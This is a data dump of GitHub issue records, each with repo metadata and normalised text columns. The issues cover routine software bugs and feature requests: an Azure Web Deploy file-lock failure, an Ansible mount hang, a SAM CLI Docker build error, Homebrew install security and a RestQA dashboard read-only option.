Unnamed: 0
int64
1
832k
id
float64
2.49B
32.1B
type
stringclasses
1 value
created_at
stringlengths
19
19
repo
stringlengths
7
112
repo_url
stringlengths
36
141
action
stringclasses
3 values
title
stringlengths
3
438
labels
stringlengths
4
308
body
stringlengths
7
254k
index
stringclasses
7 values
text_combine
stringlengths
96
254k
label
stringclasses
2 values
text
stringlengths
96
246k
binary_label
int64
0
1
4,750
24,509,339,230
IssuesEvent
2022-10-10 19:39:57
web3phl/bio
https://api.github.com/repos/web3phl/bio
opened
move the domain to bio.web3philippines.org
chore maintainers only tweak
Create a copy of the site from the main site to `bio.web3philippines.org` subdomain.
True
move the domain to bio.web3philippines.org - Create a copy of the site from the main site to `bio.web3philippines.org` subdomain.
main
move the domain to bio org create a copy of the site from the main site to bio org subdomain
1
511
3,868,584,765
IssuesEvent
2016-04-10 01:55:30
Homebrew/legacy-homebrew
https://api.github.com/repos/Homebrew/legacy-homebrew
closed
Secure Homebrew Installation Without SSL
maintainer feedback
There have been a few threads on the insecurity of having the download snippet on non-SSL http://brew.sh. Two possibilities that I haven't seen suggested, and which circumvent the need for SSL: 1. (Simpler, but may require newbies an extra step): Instead of linking in several places from secure GitHub pages to the unsecure homepage, flip the links and host the snippet on GitHub (e.g. in the readme), pointing there from the homepage 2. (Keeps the instructions on the homepage, and gives savvy users the opportunity to maintain their security, but at the expense that naive users will still be vulnerable): Create a checksum file for the installer and sign it with your PGP key. [This is what Ubuntu does](https://help.ubuntu.com/community/VerifyIsoHowto).
True
Secure Homebrew Installation Without SSL - There have been a few threads on the insecurity of having the download snippet on non-SSL http://brew.sh. Two possibilities that I haven't seen suggested, and which circumvent the need for SSL: 1. (Simpler, but may require newbies an extra step): Instead of linking in several places from secure GitHub pages to the unsecure homepage, flip the links and host the snippet on GitHub (e.g. in the readme), pointing there from the homepage 2. (Keeps the instructions on the homepage, and gives savvy users the opportunity to maintain their security, but at the expense that naive users will still be vulnerable): Create a checksum file for the installer and sign it with your PGP key. [This is what Ubuntu does](https://help.ubuntu.com/community/VerifyIsoHowto).
main
secure homebrew installation without ssl there have been a few threads on the insecurity of having the download snippet on non ssl two possibilities that i haven t seen suggested and which circumvent the need for ssl simpler but may require newbies an extra step instead of linking in several places from secure github pages to the unsecure homepage flip the links and host the snippet on github e g in the readme pointing there from the homepage keeps the instructions on the homepage and gives savvy users the opportunity to maintain their security but at the expense that naive users will still be vulnerable create a checksum file for the installer and sign it with your pgp key
1
781,314
27,432,346,973
IssuesEvent
2023-03-02 03:03:53
w3c/w3c-website
https://api.github.com/repos/w3c/w3c-website
closed
Profile missing description terms
medium priority website accessibility
On the profile page there is a `<dl>` which presents information about the user; affilliation, location, github id etc. There is an icon to visually indicate what each definition row contains. There is no alternative text for this icon so it may not be clear what each definition is. <img width="345" alt="screen shot of the profile definition list" src="https://user-images.githubusercontent.com/2444840/222102233-3026af33-b040-4e2f-9d3b-fd3d5a0db853.png"> **Expected behavior** Include alternative text for the icons. The approach taken for the preferred email address icon should be sufficient. ``` <span class="visuallyhidden">preferred email address</span> <span class="fas fa-star" aria-hidden="true" title="preferred email"></span> ```
1.0
Profile missing description terms - On the profile page there is a `<dl>` which presents information about the user; affilliation, location, github id etc. There is an icon to visually indicate what each definition row contains. There is no alternative text for this icon so it may not be clear what each definition is. <img width="345" alt="screen shot of the profile definition list" src="https://user-images.githubusercontent.com/2444840/222102233-3026af33-b040-4e2f-9d3b-fd3d5a0db853.png"> **Expected behavior** Include alternative text for the icons. The approach taken for the preferred email address icon should be sufficient. ``` <span class="visuallyhidden">preferred email address</span> <span class="fas fa-star" aria-hidden="true" title="preferred email"></span> ```
non_main
profile missing description terms on the profile page there is a which presents information about the user affilliation location github id etc there is an icon to visually indicate what each definition row contains there is no alternative text for this icon so it may not be clear what each definition is img width alt screen shot of the profile definition list src expected behavior include alternative text for the icons the approach taken for the preferred email address icon should be sufficient preferred email address
0
1,799
6,575,913,527
IssuesEvent
2017-09-11 17:48:49
ansible/ansible-modules-core
https://api.github.com/repos/ansible/ansible-modules-core
closed
Mount With Complex Password Hangs Forever
affects_2.1 bug_report waiting_on_maintainer
<!--- Verify first that your issue/request is not already reported in GitHub --> ##### ISSUE TYPE <!--- Pick one below and delete the rest: --> - Bug Report ##### COMPONENT NAME <!--- Name of the plugin/module/task --> mount ##### ANSIBLE VERSION <!--- Paste verbatim output from “ansible --version” between quotes below --> ``` $ ansible --version ansible 2.1.1.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION <!--- Mention any settings you have changed/added/removed in ansible.cfg (or using the ANSIBLE_* environment variables). --> No changes were made to ansible configuration. ##### OS / ENVIRONMENT <!--- Mention the OS you are running Ansible from, and the OS you are managing, or say “N/A” for anything that is not platform-specific. --> ubuntu 12.04 (target host) ubuntu 14.04 (ansible controller) ##### SUMMARY <!--- Explain the problem briefly --> When a mount password is provided that has unacceptable characters, fstab is not parsed properly which results in /bin/mount prompting for a password. This causes the mount command to hang silently forever. ##### STEPS TO REPRODUCE <!--- For bugs, show exactly how to reproduce the problem. For new features, show how the feature would be used. --> We're mounting an NFS drive, which (eventually) uses AD as the auth mechanism. I don't believe that contributes to the issue. The whole issue seems to be that /bin/mount is asking for stdin. <!--- Paste example playbooks or commands between quotes below --> ``` - name: setup NFS host hosts: nfs_host vars: mount_password: 'MyPassword/["HasFunnyCharacters' tasks: - name: mount nfs share mount: name: "/mnt/myshare" src: "//myshare/somedir" fstype: "cifs" opts: "domain=mydomain,user=myuser,password={{ mount_password }}" state: mounted ``` <!--- You can also paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- What did you expect to happen when running the steps above? --> I believe that mount should timeout or die rather quickly if input is requested but unavailable. I realize there are various other mount options to use to avoid this scenario, but it would be nice if the mount module handled the input request in some elegant way and fail out. ##### ACTUAL RESULTS <!--- What actually happened? If possible run with extra verbosity (-vvvv) --> Mount will hang forever when `/bin/mount /mnt/myshare` is called. <!--- Paste verbatim command output between quotes below -->
True
Mount With Complex Password Hangs Forever - <!--- Verify first that your issue/request is not already reported in GitHub --> ##### ISSUE TYPE <!--- Pick one below and delete the rest: --> - Bug Report ##### COMPONENT NAME <!--- Name of the plugin/module/task --> mount ##### ANSIBLE VERSION <!--- Paste verbatim output from “ansible --version” between quotes below --> ``` $ ansible --version ansible 2.1.1.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION <!--- Mention any settings you have changed/added/removed in ansible.cfg (or using the ANSIBLE_* environment variables). --> No changes were made to ansible configuration. ##### OS / ENVIRONMENT <!--- Mention the OS you are running Ansible from, and the OS you are managing, or say “N/A” for anything that is not platform-specific. --> ubuntu 12.04 (target host) ubuntu 14.04 (ansible controller) ##### SUMMARY <!--- Explain the problem briefly --> When a mount password is provided that has unacceptable characters, fstab is not parsed properly which results in /bin/mount prompting for a password. This causes the mount command to hang silently forever. ##### STEPS TO REPRODUCE <!--- For bugs, show exactly how to reproduce the problem. For new features, show how the feature would be used. --> We're mounting an NFS drive, which (eventually) uses AD as the auth mechanism. I don't believe that contributes to the issue. The whole issue seems to be that /bin/mount is asking for stdin. <!--- Paste example playbooks or commands between quotes below --> ``` - name: setup NFS host hosts: nfs_host vars: mount_password: 'MyPassword/["HasFunnyCharacters' tasks: - name: mount nfs share mount: name: "/mnt/myshare" src: "//myshare/somedir" fstype: "cifs" opts: "domain=mydomain,user=myuser,password={{ mount_password }}" state: mounted ``` <!--- You can also paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- What did you expect to happen when running the steps above? --> I believe that mount should timeout or die rather quickly if input is requested but unavailable. I realize there are various other mount options to use to avoid this scenario, but it would be nice if the mount module handled the input request in some elegant way and fail out. ##### ACTUAL RESULTS <!--- What actually happened? If possible run with extra verbosity (-vvvv) --> Mount will hang forever when `/bin/mount /mnt/myshare` is called. <!--- Paste verbatim command output between quotes below -->
main
mount with complex password hangs forever issue type bug report component name mount ansible version ansible version ansible config file etc ansible ansible cfg configured module search path default w o overrides configuration mention any settings you have changed added removed in ansible cfg or using the ansible environment variables no changes were made to ansible configuration os environment mention the os you are running ansible from and the os you are managing or say “n a” for anything that is not platform specific ubuntu target host ubuntu ansible controller summary when a mount password is provided that has unacceptable characters fstab is not parsed properly which results in bin mount prompting for a password this causes the mount command to hang silently forever steps to reproduce for bugs show exactly how to reproduce the problem for new features show how the feature would be used we re mounting an nfs drive which eventually uses ad as the auth mechanism i don t believe that contributes to the issue the whole issue seems to be that bin mount is asking for stdin name setup nfs host hosts nfs host vars mount password mypassword hasfunnycharacters tasks name mount nfs share mount name mnt myshare src myshare somedir fstype cifs opts domain mydomain user myuser password mount password state mounted expected results i believe that mount should timeout or die rather quickly if input is requested but unavailable i realize there are various other mount options to use to avoid this scenario but it would be nice if the mount module handled the input request in some elegant way and fail out actual results mount will hang forever when bin mount mnt myshare is called
1
4,196
6,423,784,590
IssuesEvent
2017-08-09 11:59:44
Microsoft/vsts-tasks
https://api.github.com/repos/Microsoft/vsts-tasks
closed
Azure App Service Deploy: ERROR_FILE_IN_USE (even with Take App Offline + Rename locked files)
Area: Release AzureAppService
Lately we've been seeing frequent failures in our VSTS releases of our ASP .NET Core app with output like the following (edited for privacy/clarity): ``` [command]"C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe" -verb:sync -source:package='package.zip' -dest:contentPath='mysite',ComputerName='https://mysite.scm.azurewebsites.net:443/msdeploy.axd?site=mysite',UserName='********',Password='********',AuthType='Basic' -enableRule:AppOffline -enableRule:DoNotDeleteRule -userAgent:myagent --- ##[error]Failed to deploy web package to App Service. ##[warning]Try to deploy app service again with Rename locked files option selected. ##[error]Error Code: ERROR_FILE_IN_USE More Information: Web Deploy cannot modify the file '***.exe' on the destination because it is locked by an external process. In order to allow the publish operation to succeed, you may need to either restart your application to release the lock, or use the AppOffline rule handler for .Net applications on your next publish attempt. Learn more at: http://go.microsoft.com/fwlink/?LinkId=221672#ERROR_FILE_IN_USE. Error count: 1. ##[error]Error: C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe failed with return code: 4294967295 ``` We are on task version 3.3.12. We have both "Take App Offline" and "Rename locked files" checked. It appears that -enableRule:AppOffline is being passed to MSDeploy.exe. We're not sure if this is a bug in the VSTS task, in MSDeploy, or in Azure App Service. It appears that similar feedback was reported [here](https://developercommunity.visualstudio.com/content/problem/18621/the-take-app-offline-option-in-deploy-step-doesnt.html), but was dismissed as "Not a Bug" with the suggested workaround being to use a separate task to take the app offline/online. If the task can't (for whatever reason) guarantee to take the app offline, then the "Take App Offline" option should be removed from the task entirely.
1.0
Azure App Service Deploy: ERROR_FILE_IN_USE (even with Take App Offline + Rename locked files) - Lately we've been seeing frequent failures in our VSTS releases of our ASP .NET Core app with output like the following (edited for privacy/clarity): ``` [command]"C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe" -verb:sync -source:package='package.zip' -dest:contentPath='mysite',ComputerName='https://mysite.scm.azurewebsites.net:443/msdeploy.axd?site=mysite',UserName='********',Password='********',AuthType='Basic' -enableRule:AppOffline -enableRule:DoNotDeleteRule -userAgent:myagent --- ##[error]Failed to deploy web package to App Service. ##[warning]Try to deploy app service again with Rename locked files option selected. ##[error]Error Code: ERROR_FILE_IN_USE More Information: Web Deploy cannot modify the file '***.exe' on the destination because it is locked by an external process. In order to allow the publish operation to succeed, you may need to either restart your application to release the lock, or use the AppOffline rule handler for .Net applications on your next publish attempt. Learn more at: http://go.microsoft.com/fwlink/?LinkId=221672#ERROR_FILE_IN_USE. Error count: 1. ##[error]Error: C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe failed with return code: 4294967295 ``` We are on task version 3.3.12. We have both "Take App Offline" and "Rename locked files" checked. It appears that -enableRule:AppOffline is being passed to MSDeploy.exe. We're not sure if this is a bug in the VSTS task, in MSDeploy, or in Azure App Service. It appears that similar feedback was reported [here](https://developercommunity.visualstudio.com/content/problem/18621/the-take-app-offline-option-in-deploy-step-doesnt.html), but was dismissed as "Not a Bug" with the suggested workaround being to use a separate task to take the app offline/online. If the task can't (for whatever reason) guarantee to take the app offline, then the "Take App Offline" option should be removed from the task entirely.
non_main
azure app service deploy error file in use even with take app offline rename locked files lately we ve been seeing frequent failures in our vsts releases of our asp net core app with output like the following edited for privacy clarity c program files iis microsoft web deploy msdeploy exe verb sync source package package zip dest contentpath mysite computername enablerule appoffline enablerule donotdeleterule useragent myagent failed to deploy web package to app service try to deploy app service again with rename locked files option selected error code error file in use more information web deploy cannot modify the file exe on the destination because it is locked by an external process in order to allow the publish operation to succeed you may need to either restart your application to release the lock or use the appoffline rule handler for net applications on your next publish attempt learn more at error count error c program files iis microsoft web deploy msdeploy exe failed with return code we are on task version we have both take app offline and rename locked files checked it appears that enablerule appoffline is being passed to msdeploy exe we re not sure if this is a bug in the vsts task in msdeploy or in azure app service it appears that similar feedback was reported but was dismissed as not a bug with the suggested workaround being to use a separate task to take the app offline online if the task can t for whatever reason guarantee to take the app offline then the take app offline option should be removed from the task entirely
0
4,744
24,480,406,174
IssuesEvent
2022-10-08 19:00:12
centerofci/mathesar
https://api.github.com/repos/centerofci/mathesar
opened
Closing the context menu should not pass the click through
type: bug work: frontend status: ready restricted: maintainers
## Steps to reproduce 1. Select one table cell. 1. Open the context menu within that table cell. 1. With the context menu still open, click on another table cell. 1. Observe the context menu to close (good). 1. Expect your original selection to remain unchanged because your click was intended only to close the menu. (In testing other products, clicking to close a context menu does not ever seem to pass the click through.) 1. Instead, observe that the click has been ass through modifying the cell selection.
True
Closing the context menu should not pass the click through - ## Steps to reproduce 1. Select one table cell. 1. Open the context menu within that table cell. 1. With the context menu still open, click on another table cell. 1. Observe the context menu to close (good). 1. Expect your original selection to remain unchanged because your click was intended only to close the menu. (In testing other products, clicking to close a context menu does not ever seem to pass the click through.) 1. Instead, observe that the click has been ass through modifying the cell selection.
main
closing the context menu should not pass the click through steps to reproduce select one table cell open the context menu within that table cell with the context menu still open click on another table cell observe the context menu to close good expect your original selection to remain unchanged because your click was intended only to close the menu in testing other products clicking to close a context menu does not ever seem to pass the click through instead observe that the click has been ass through modifying the cell selection
1
3,663
14,952,086,855
IssuesEvent
2021-01-26 15:08:16
zoj613/polya-gamma
https://api.github.com/repos/zoj613/polya-gamma
closed
MAINT: Update the hybrid sampler.
maintainance
The hybrid sampler needs to be updated now that all methods have been implemented. Windle et al (2014) has recommendations for a hybrid sampler in page 24. I need to run some benchmarks to adapt the recommendations to this implementation.
True
MAINT: Update the hybrid sampler. - The hybrid sampler needs to be updated now that all methods have been implemented. Windle et al (2014) has recommendations for a hybrid sampler in page 24. I need to run some benchmarks to adapt the recommendations to this implementation.
main
maint update the hybrid sampler the hybrid sampler needs to be updated now that all methods have been implemented windle et al has recommendations for a hybrid sampler in page i need to run some benchmarks to adapt the recommendations to this implementation
1
42,101
10,818,863,722
IssuesEvent
2019-11-08 13:09:23
ESA-VirES/WebClient-Framework
https://api.github.com/repos/ESA-VirES/WebClient-Framework
closed
Products in the sources list outside of the requested time interval.
defect
When, e.g., data from 2019-08-27 up to 2019-08-28 are requested data from 2019-08-27T00:00:00Z up to 2019-08-27T23:59:59Z will be correctly returned. The sources list however contains also `SW_OPER_MAGA_LR_1B_20190828T000000_20190828T235959_0505_MDR_MAG_LR` (the next day) even though the requested time span does not overlap two days.
1.0
Products in the sources list outside of the requested time interval. - When, e.g., data from 2019-08-27 up to 2019-08-28 are requested data from 2019-08-27T00:00:00Z up to 2019-08-27T23:59:59Z will be correctly returned. The sources list however contains also `SW_OPER_MAGA_LR_1B_20190828T000000_20190828T235959_0505_MDR_MAG_LR` (the next day) even though the requested time span does not overlap two days.
non_main
products in the sources list outside of the requested time interval when e g data from up to are requested data from up to will be correctly returned the sources list however contains also sw oper maga lr mdr mag lr the next day even though the requested time span does not overlap two days
0
226,934
17,367,784,143
IssuesEvent
2021-07-30 09:42:47
mvahowe/proskomma-js
https://api.github.com/repos/mvahowe/proskomma-js
closed
Autogenerate GraphQL Documentation
Graph documentation
- [x] Find a way to put html documentation online, preferably in readthedocs - [x] Add documentation strings throughout the graph
1.0
Autogenerate GraphQL Documentation - - [x] Find a way to put html documentation online, preferably in readthedocs - [x] Add documentation strings throughout the graph
non_main
autogenerate graphql documentation find a way to put html documentation online preferably in readthedocs add documentation strings throughout the graph
0
5,784
2,793,977,133
IssuesEvent
2015-05-11 14:25:22
NUKnightLab/StoryMapJS
https://api.github.com/repos/NUKnightLab/StoryMapJS
closed
Require Mapbox access token when using Mapbox base layer
ready to test
As part of changes to Mapbox's service, loading the javascript now requires an access token. We now understand that this access token is used for billing, so we should require that users enter their own access token, which should be used [when loading Mapbox tiles](https://github.com/NUKnightLab/StoryMapJS/blob/master/source/js/map/leaflet/VCO.Map.Leaflet.js#L177). Near the field where we request this from users, we can link to [this Mapbox page](https://www.mapbox.com/help/define-access-token/) which gives more information. Since there are maps in the wild depending upon our access token, we should continue to use it as a default, but the authoring tool should insist that new maps created to use Mapbox layers be accompanied by a new access token. To the extent possible, we should also force users editing existing maps using Mapbox to enter their own access token, but if that seems like a snarl, we could break that into a separate issue and prioritize it separately.
1.0
Require Mapbox access token when using Mapbox base layer - As part of changes to Mapbox's service, loading the javascript now requires an access token. We now understand that this access token is used for billing, so we should require that users enter their own access token, which should be used [when loading Mapbox tiles](https://github.com/NUKnightLab/StoryMapJS/blob/master/source/js/map/leaflet/VCO.Map.Leaflet.js#L177). Near the field where we request this from users, we can link to [this Mapbox page](https://www.mapbox.com/help/define-access-token/) which gives more information. Since there are maps in the wild depending upon our access token, we should continue to use it as a default, but the authoring tool should insist that new maps created to use Mapbox layers be accompanied by a new access token. To the extent possible, we should also force users editing existing maps using Mapbox to enter their own access token, but if that seems like a snarl, we could break that into a separate issue and prioritize it separately.
non_main
require mapbox access token when using mapbox base layer as part of changes to mapbox s service loading the javascript now requires an access token we now understand that this access token is used for billing so we should require that users enter their own access token which should be used near the field where we request this from users we can link to which gives more information since there are maps in the wild depending upon our access token we should continue to use it as a default but the authoring tool should insist that new maps created to use mapbox layers be accompanied by a new access token to the extent possible we should also force users editing existing maps using mapbox to enter their own access token but if that seems like a snarl we could break that into a separate issue and prioritize it separately
0
350,448
10,490,484,470
IssuesEvent
2019-09-25 09:06:00
ballerina-platform/lsp4intellij
https://api.github.com/repos/ballerina-platform/lsp4intellij
closed
Add line-based code actions support
Priority/Normal Type/New Feature
**Description:** Currently we only support diagnostics bound code actions and the aforementioned feature is available in the vs code language client. Basically we will have to add a caret listener and send a code actions request each time when the caret position is changed. **Suggested Labels:** <!-- Optional comma separated list of suggested labels. Non committers can’t assign labels to issues, so this will help issue creators who are not a committer to suggest possible labels--> **Suggested Assignees:** <!--Optional comma separated list of suggested team members who should attend the issue. Non committers can’t assign issues to assignees, so this will help issue creators who are not a committer to suggest possible assignees--> **Affected Product Version:** **OS, DB, other environment details and versions:** **Steps to reproduce:** **Related Issues:** <!-- Any related issues such as sub tasks, issues reported in other repositories (e.g component repositories), similar problems, etc. -->
1.0
Add line-based code actions support - **Description:** Currently we only support diagnostics bound code actions and the aforementioned feature is available in the vs code language client. Basically we will have to add a caret listener and send a code actions request each time when the caret position is changed. **Suggested Labels:** <!-- Optional comma separated list of suggested labels. Non committers can’t assign labels to issues, so this will help issue creators who are not a committer to suggest possible labels--> **Suggested Assignees:** <!--Optional comma separated list of suggested team members who should attend the issue. Non committers can’t assign issues to assignees, so this will help issue creators who are not a committer to suggest possible assignees--> **Affected Product Version:** **OS, DB, other environment details and versions:** **Steps to reproduce:** **Related Issues:** <!-- Any related issues such as sub tasks, issues reported in other repositories (e.g component repositories), similar problems, etc. -->
non_main
add line based code actions support description currently we only support diagnostics bound code actions and the aforementioned feature is available in the vs code language client basically we will have to add a caret listener and send a code actions request each time when the caret position is changed suggested labels suggested assignees affected product version os db other environment details and versions steps to reproduce related issues
0
5,384
27,063,121,197
IssuesEvent
2023-02-13 21:29:25
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
reopened
sam local start-api fails to move /var/rapid/aws-lambda-rie-x86_64 in docker image for serverless function
type/bug area/local/start-api stage/needs-investigation stage/bug-repro maintainer/need-followup
<!-- Make sure we don't have an existing Issue that reports the bug you are seeing (both open and closed). If you do find an existing Issue, re-open or add a comment to that Issue instead of creating a new one. --> ### Description: Accessing a lambda using a custom docker image with python awslambdaric fails with: samcli.commands.local.cli_common.user_exceptions.ImageBuildException: Error building docker image: The command '/bin/sh -c mv /var/rapid/aws-lambda-rie-x86_64 /var/rapid/aws-lambda-rie && chmod +x /var/rapid/aws-lambda-rie' returned a non-zero code: 1 ### Steps to reproduce: <!-- Provide detailed steps to replicate the bug, including steps from third party tools (CDK, etc.) --> Create a serverless function with a custom docker image that uses awslambdaric try to access it through an HttpApi locally. ### Observed result: ``` Invoking Container created from httphandler:latest Image was not found. Removing rapid images for repo httphandler Building image.............. Failed to build Docker Image NoneType: None Exception on / [GET] Traceback (most recent call last): File "flask/app.py", line 2447, in wsgi_app File "flask/app.py", line 1952, in full_dispatch_request File "flask/app.py", line 1821, in handle_user_exception File "flask/_compat.py", line 39, in reraise File "flask/app.py", line 1950, in full_dispatch_request File "flask/app.py", line 1936, in dispatch_request File "samcli/local/apigw/local_apigw_service.py", line 357, in _request_handler File "samcli/commands/local/lib/local_lambda.py", line 144, in invoke File "samcli/lib/telemetry/metric.py", line 230, in wrapped_func File "samcli/local/lambdafn/runtime.py", line 177, in invoke File "samcli/local/lambdafn/runtime.py", line 88, in create File "samcli/local/docker/lambda_container.py", line 94, in __init__ File "samcli/local/docker/lambda_container.py", line 236, in _get_image File "samcli/local/docker/lambda_image.py", line 164, in build File "samcli/local/docker/lambda_image.py", line 278, in _build_image samcli.commands.local.cli_common.user_exceptions.ImageBuildException: Error building docker image: The command '/bin/sh -c mv /var/rapid/aws-lambda-rie-x86_64 /var/rapid/aws-lambda-rie && chmod +x /var/rapid/aws-lambda-rie' returned a non-zero code: 1 2022-05-19 01:01:55 127.0.0.1 - - [19/May/2022 01:01:55] "GET / HTTP/1.1" 502 - ``` ### Expected result: Should just work or tell how to fix the issue with moving rapid/aws-lambda-rie ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Fedora 2. `sam --version`: 1.50.0 3. AWS region: us-east-1
True
sam local start-api fails to move /var/rapid/aws-lambda-rie-x86_64 in docker image for serverless function - <!-- Make sure we don't have an existing Issue that reports the bug you are seeing (both open and closed). If you do find an existing Issue, re-open or add a comment to that Issue instead of creating a new one. --> ### Description: Accessing a lambda using a custom docker image with python awslambdaric fails with: samcli.commands.local.cli_common.user_exceptions.ImageBuildException: Error building docker image: The command '/bin/sh -c mv /var/rapid/aws-lambda-rie-x86_64 /var/rapid/aws-lambda-rie && chmod +x /var/rapid/aws-lambda-rie' returned a non-zero code: 1 ### Steps to reproduce: <!-- Provide detailed steps to replicate the bug, including steps from third party tools (CDK, etc.) --> Create a serverless function with a custom docker image that uses awslambdaric try to access it through an HttpApi locally. ### Observed result: ``` Invoking Container created from httphandler:latest Image was not found. Removing rapid images for repo httphandler Building image.............. Failed to build Docker Image NoneType: None Exception on / [GET] Traceback (most recent call last): File "flask/app.py", line 2447, in wsgi_app File "flask/app.py", line 1952, in full_dispatch_request File "flask/app.py", line 1821, in handle_user_exception File "flask/_compat.py", line 39, in reraise File "flask/app.py", line 1950, in full_dispatch_request File "flask/app.py", line 1936, in dispatch_request File "samcli/local/apigw/local_apigw_service.py", line 357, in _request_handler File "samcli/commands/local/lib/local_lambda.py", line 144, in invoke File "samcli/lib/telemetry/metric.py", line 230, in wrapped_func File "samcli/local/lambdafn/runtime.py", line 177, in invoke File "samcli/local/lambdafn/runtime.py", line 88, in create File "samcli/local/docker/lambda_container.py", line 94, in __init__ File "samcli/local/docker/lambda_container.py", line 236, in _get_image File "samcli/local/docker/lambda_image.py", line 164, in build File "samcli/local/docker/lambda_image.py", line 278, in _build_image samcli.commands.local.cli_common.user_exceptions.ImageBuildException: Error building docker image: The command '/bin/sh -c mv /var/rapid/aws-lambda-rie-x86_64 /var/rapid/aws-lambda-rie && chmod +x /var/rapid/aws-lambda-rie' returned a non-zero code: 1 2022-05-19 01:01:55 127.0.0.1 - - [19/May/2022 01:01:55] "GET / HTTP/1.1" 502 - ``` ### Expected result: Should just work or tell how to fix the issue with moving rapid/aws-lambda-rie ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Fedora 2. `sam --version`: 1.50.0 3. AWS region: us-east-1
main
sam local start api fails to move var rapid aws lambda rie in docker image for serverless function make sure we don t have an existing issue that reports the bug you are seeing both open and closed if you do find an existing issue re open or add a comment to that issue instead of creating a new one description accessing a lambda using a custom docker image with python awslambdaric fails with samcli commands local cli common user exceptions imagebuildexception error building docker image the command bin sh c mv var rapid aws lambda rie var rapid aws lambda rie chmod x var rapid aws lambda rie returned a non zero code steps to reproduce create a serverless function with a custom docker image that uses awslambdaric try to access it through an httpapi locally observed result invoking container created from httphandler latest image was not found removing rapid images for repo httphandler building image failed to build docker image nonetype none exception on traceback most recent call last file flask app py line in wsgi app file flask app py line in full dispatch request file flask app py line in handle user exception file flask compat py line in reraise file flask app py line in full dispatch request file flask app py line in dispatch request file samcli local apigw local apigw service py line in request handler file samcli commands local lib local lambda py line in invoke file samcli lib telemetry metric py line in wrapped func file samcli local lambdafn runtime py line in invoke file samcli local lambdafn runtime py line in create file samcli local docker lambda container py line in init file samcli local docker lambda container py line in get image file samcli local docker lambda image py line in build file samcli local docker lambda image py line in build image samcli commands local cli common user exceptions imagebuildexception error building docker image the command bin sh c mv var rapid aws lambda rie var rapid aws lambda rie chmod x var rapid aws lambda rie returned a non zero code get http expected result should just work or tell how to fix the issue with moving rapid aws lambda rie additional environment details ex windows mac amazon linux etc os fedora sam version aws region us east
1
2,473
8,639,906,971
IssuesEvent
2018-11-23 22:35:15
F5OEO/rpitx
https://api.github.com/repos/F5OEO/rpitx
closed
Running setTime.py continuously
V1 related (not maintained)
Hi, I would like to use rpitx to run a DCF77 transmitter in my house. I would like it to be running 24 hours a day, just going and going. setTime.py appears to only run a certain number of minutes before quitting. I know I could repeatedly start it up using cron, but is there a nicer solution? Thanks Matt
True
Running setTime.py continuously - Hi, I would like to use rpitx to run a DCF77 transmitter in my house. I would like it to be running 24 hours a day, just going and going. setTime.py appears to only run a certain number of minutes before quitting. I know I could repeatedly start it up using cron, but is there a nicer solution? Thanks Matt
main
running settime py continuously hi i would like to use rpitx to run a transmitter in my house i would like it to be running hours a day just going and going settime py appears to only run a certain number of minutes before quitting i know i could repeatedly start it up using cron but is there a nicer solution thanks matt
1
92,638
11,694,511,090
IssuesEvent
2020-03-06 04:20:49
evdotjs/my-projects
https://api.github.com/repos/evdotjs/my-projects
closed
[todo-list] re-design ui
design
The app functions properly but is not very intuitive to use. For example, the `edit` and `toggle completed` functions can be included with each to-do list item similar to how the delete function is.
1.0
[todo-list] re-design ui - The app functions properly but is not very intuitive to use. For example, the `edit` and `toggle completed` functions can be included with each to-do list item similar to how the delete function is.
non_main
re design ui the app functions properly but is not very intuitive to use for example the edit and toggle completed functions can be included with each to do list item similar to how the delete function is
0
3,895
17,330,751,864
IssuesEvent
2021-07-28 01:43:30
restqa/restqa
https://api.github.com/repos/restqa/restqa
closed
Dashboard: read only on the editor
enhancement pair with maintainer
Hello 👋, ### 👀 Background The RestQA Dashboard could be deployed on a remote server. However some team would like to deploy the server in order to access to all the feature and run any of them. ### ✌️ What is the actual behavior? Each feature file could be updated by anyone through the dashboard UI. ### 🕵️‍♀️ How to reproduce the current behavior? 1. Install RestQA 2. Run the command `restqa init` to initialize a brand new project 3. Run the command `restqa dashboard` to launch the dashboard 4. Access the dashboard through the url http://localhost:8081 5. Go to Editor menu and update one feature file. ### 🤞 What is the expected behavior? On some team setup we would prefer to not allow the user to edit the the feature when the restqa dashboard is deployed on a remote server. ### 😎 Proposed solution. On the `.restqa.yml` configuration file , we could add the property `editable` is the object `restqa.dashboard` such as : ```yaml restqa: dashboard: editable: true ``` The default value will be true. The value could also be overrode by the environment variable `RESTQA_DASHBOARD_EDITABLE=true`, example: ``` RESTQA_DASHBOARD_EDITABLE=false restqa dashboard ``` Or through the option `-e | --editable` ``` restqa dashboard --editable false ``` Cheers.
True
Dashboard: read only on the editor - Hello 👋, ### 👀 Background The RestQA Dashboard could be deployed on a remote server. However some team would like to deploy the server in order to access to all the feature and run any of them. ### ✌️ What is the actual behavior? Each feature file could be updated by anyone through the dashboard UI. ### 🕵️‍♀️ How to reproduce the current behavior? 1. Install RestQA 2. Run the command `restqa init` to initialize a brand new project 3. Run the command `restqa dashboard` to launch the dashboard 4. Access the dashboard through the url http://localhost:8081 5. Go to Editor menu and update one feature file. ### 🤞 What is the expected behavior? On some team setup we would prefer to not allow the user to edit the the feature when the restqa dashboard is deployed on a remote server. ### 😎 Proposed solution. On the `.restqa.yml` configuration file , we could add the property `editable` is the object `restqa.dashboard` such as : ```yaml restqa: dashboard: editable: true ``` The default value will be true. The value could also be overrode by the environment variable `RESTQA_DASHBOARD_EDITABLE=true`, example: ``` RESTQA_DASHBOARD_EDITABLE=false restqa dashboard ``` Or through the option `-e | --editable` ``` restqa dashboard --editable false ``` Cheers.
main
